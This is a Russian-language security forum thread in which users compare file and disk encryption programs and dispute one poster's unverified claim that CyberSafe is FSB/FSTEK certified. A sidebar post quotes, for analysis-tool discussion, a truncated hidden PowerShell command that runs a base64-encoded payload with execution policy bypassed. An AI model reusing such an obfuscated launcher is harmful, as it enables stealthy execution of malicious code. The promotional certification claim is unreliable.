Перейти к содержанию
Сергей Ильин

Программы шифрования для персональных компьютеров

Recommended Posts

Vasili
Читатель @ 16.02.2009, 15:13

Очень подозрительная программа

И здесь Вы абсолютно правы. Мало того, что это программа, так она еще и очень! Все это чрезвычайно подозрительно!

Читатель @ 16.02.2009, 15:13

Если мне извесен пароль, зачем мне ломать голову над шифрованным файлом: я расшифрую его и увижу содержимое?

Для понимания почитайте что-нибудь по основам криптографии.

Читатель @ 16.02.2009, 15:13

"Белый шум", как правило, относиться к аналоговым сигналам. Получается необходимо АЦП

"Белый шум" относится ко всем без исключения реальным процессам. Не исключено, что в случае с компьютерным обеспечением АЦП возможно реализовать программно.

Читатель @ 16.02.2009, 15:13

Если в обычном тексте случайно исказить 20% байт (даже - более), то ...

:blink: Это что было?

Читатель @ 16.02.2009, 15:13

Зачем нужна эта "многослойность"

И снова советую ознакомиться хотя бы с элементарными основами и понятиями криптографии

Читатель @ 16.02.2009, 15:13

Почему ровно 2 ?

Вам известно о существовании таких, например, распространенных вещей, как ответ на "контрольный вопрос" в случае забытия основного пароля?

Читатель @ 16.02.2009, 15:13

Никогда не слышал, чтобы для защиты от потери информации при программных и аппаратных сбоях использовали криптографию!

Скорее всего речь идет о защите от потери информации в процессе шифрования/расшифровки

Пользуюсь этой прогой около месяца, самый большой ее недостаток в невозможности создания виртуальных шифрованных дисков, но автор обещает реализовать это в будущем. Поживем - увидим.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
hideki87
Для личных целей - TrueCrypt, подпиленный напильником для поддержки ГОСТ 28147-89.

тоже очень надо ГОСТ в truecrypt! выложи или отправь на почту плж исходники!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dot_sent
тоже очень надо ГОСТ в truecrypt! выложи или отправь на почту плж исходники!

Во-первых, я этот продукт разрабатывал не один.

Во-вторых, программный продукт, который получился в итоге, был зарегистрирован, как объект авторского права и используется в коммерческих целях.

Потому исходниками делиться не имею права - ни морального, ни юридического.

А вот просто помочь в написании - почему бы и нет? В чем, собственно, состоит основная проблема? Каких именно знаний не хватает?

P.S. Собирался отправить это сообщение в PM, но он пока для вас отключен - слишком мало сообщений на форуме. Можете связаться со мной по адресу [email protected]

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
hideki87
Во-первых, я этот продукт разрабатывал не один.

Во-вторых, программный продукт, который получился в итоге, был зарегистрирован, как объект авторского права и используется в коммерческих целях.

Потому исходниками делиться не имею права - ни морального, ни юридического.

А вот просто помочь в написании - почему бы и нет? В чем, собственно, состоит основная проблема? Каких именно знаний не хватает?

P.S. Собирался отправить это сообщение в PM, но он пока для вас отключен - слишком мало сообщений на форуме. Можете связаться со мной по адресу [email protected]

Спасибо всем! Не думал, что так быстро ответите. По поводу помочь - будет очень кстати, отписал на указанную почту свои вопросы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
VladimirK

В начале, какие программы Я НЕ ИСПОЛЬЗУЮ: это бесплатные программы и программы с закрытым исходным кодом.

Про закрытый код - понятно, потому что не хочется доверять свои данные разработчикам, не желающим раскрывать исходный код своего ПО.

Не использую бесплатные программы, потому что знаю: "бесплатный сыр - только в мышеловке". Даже к такой программе как TrueCtypt это, к сожалению по всей видимости относится:

- цитата из Википедии: "Лицензия программы считалась свободной, однако при её проверке для включения TrueCrypt в Fedora в октябре 2008 года были обнаружены опасные и делающие её несвободной неоднозначности" (http://ru.wikipedia.org/wiki/TrueCrypt).

- "она сделана невидимками, анонимной группой людей, которые придумали загадочные нестандартные лицензии" - цитата из интервью с Мэттью Гринном, ведущим криптографом из Университета Дж. Хопкинса в Балтиморе. Подробнее об этом в статье "СОЗДАТЕЛИ TRUECRYPT - СОТРУДНИКИ АНБ?" (http://www.capa.me/195349-truecrypt.html).

Поэтому, Я ИСПОЛЬЗУЮ только программы с открытым исходным кодом и платные. Думаю, каждый согласится с тем, что получать деньги за свою работу - это вполне нормально, так и должно быть. Сейчас это программа CyberSafe Top Secret. Выбрал ее потому что: open source, разработка российских программистов, сертифицирована ФСБ и ФСТЭК - все сертификаты выложены на сайте, поддержка всех современных алгоритмов (AES, RSA, BlowFish, ГОСТ и др.). За что еще люблю эту программу - так это за профессиональный подход - она не только шифрует файлы и папки, но и надежно скрывает их, как от других пользователей, так и от самого Windows.

Основные функции:

- полнодисковое шифрование (в том числе и системный диск);

- создание виртуальных зашифрованных дисков (криптоконтейнеров);

- шифрования отдельных файлов и папок с присвоением им различных уровней секретности (ДСП, Секретно, Совершенно Секретно);

- шифрование внешних жестких дисков и USB флеш-накопителей;

- поддержка S/MIME и шифрование всех почтовых клиентов на основе сертификатов;

- шифрование на основе инфраструктуры открытых ключей (PKI);

- резервное копирование и шифрование на облаке Amazon S3;

- шифрование Skype.

Официальный сайт программы: http://cybersafesoft.com/rus/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr. Faust

Всегда мне нравилась позиция — раз опен сорс, — значит априори безопасно. :)

Но хотел написать не об этом, вот вы пишете

Выбрал ее потому что: open source, разработка российских программистов, сертифицирована ФСБ и ФСТЭК - все сертификаты выложены на сайте, поддержка всех современных алгоритмов (AES, RSA, BlowFish, ГОСТ и др.).

Я посмотрел сайт и так называемые "лицензии" ни одной бумаги, которая подтверждает сертификацию любого из продуктов во ФСТЭК или ФСБ я не увидел, равно как не нашёл в списке сертифицированных продуктов ФСТЭК ни компании разработчика, ни одного из продуктов. Может быть я что-то пропустил?

https://docs.google.com/spreadsheet/lv?key=...Q2X3c&hl=ru

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

Выбрал ее потому что: open source, разработка российских программистов, сертифицирована ФСБ и ФСТЭК - все сертификаты выложены на сайте,

На сайте выложены лицензии ООО "ДОРФ" на осуществление видов деятельности, связанных с ТЗИ и КЗИ, и ни одного (!) документа, подтверждающего малейшую сертификацию самого продукта. Потому ваш пост выглядит неприкрытой рекламой, причем с подачей непроверенной (не хочу говорить - "неправдивой") информации

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr. Faust

Там сайт один большой фейспалм.

Возможно вы удивитесь, когда узнаете о том, что если на вашем компьютере не установлена специальная программа для шифрования скайп чата, передаваемые при помощи этого приложения текстовые сообщения можно перехватить и расшифровать.

Однако это еще не все. Необходимость в защите скайп-трафика обусловлена также и особенностями самого приложения. Ведь мало кто знает, что на сегодняшний день скайп является одним из наиболее секретных и малоизученных клиентов, принцип действия и методы которого до конца не известны.

Вся информация, отправляемая в сеть посредством скайпа, шифруется самой программой и отправляется в сеть, однако что именно отправляется и куда именно точно никому не известно. Создатели программы, которая распространяется бесплатно, не раскрывают ее исходных текстов и используют закрытый протокол. Можно сказать, скайп – это настоящий черный ящик с многоуровневой системой шифрования, передающий информацию в сеть по закрытому протоколу. При этом программа обходит все существующие брандмауэры и файрволы, что превращает ее в идеального переносчика вирусов и вредоносных программ.

http://cybersafesoft.com/rus/products/skype-ecnryption/

Никому неизвестный Скайп.

https://support.skype.com/resources/sites/S...l-datasheet.pdf

Использование PKI.

Шифрование трафика осуществляется принудительно еще до того, как он попадает в сеть, для чего используется инфраструктура открытых ключей (Public Key Infrastructure). В настоящее время не существует способов взлома этого алгоритма.

Алгоритма, да.

http://ru.wikipedia.org/wiki/Инфраструктура_открытых_ключей

Так называемые лицензии, всего лишь разрешение на предоставление услуг и разрешение на продажу, в переводе на русский, предъявителю сего дано высокое право продать коробку с крипто ПРО.

Feel difference

http://www.securitycode.ru/products/pak_sobol/sertificates/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
StarStream

Всем привет! Есть необходимость поместить  важные данные в переносной криптоконтейнер размером до 2 Gb, т.к. шифрование всей системы не требуется. Система - Windows 7 x64. Для этих целей присмотрел BestCrypt Container Encryption 9 от Jetico.  В этой программе доступны среди прочих такие алгоритмы как AES и  ГОСТ 28147-89. Отсюда вопрос. Какой из этих алгоритмов будет надежнее?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Killer

Какой из этих алгоритмов будет надежнее?

 

Против кого защищацца собрались? Если против домохозяек - выбирайте любой, математически они его не поломают. Если против серьезного противника, то "BestCrypt Container Encryption 9 от Jetico" - плохая идея. Могу рекомендовать DiskCryptor. Можете им флешку зашифровать.

 

Если нужен вам кровь из носа именно _контейнер_ - то Truecrypt. В криптографическом софте недопустим закрытый код. Хеш - whirlpool, + каскад из aes, twofish, serpent. На ваших 2-х гигах замедление передачи данных из за каскада шифров не будет критичным.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×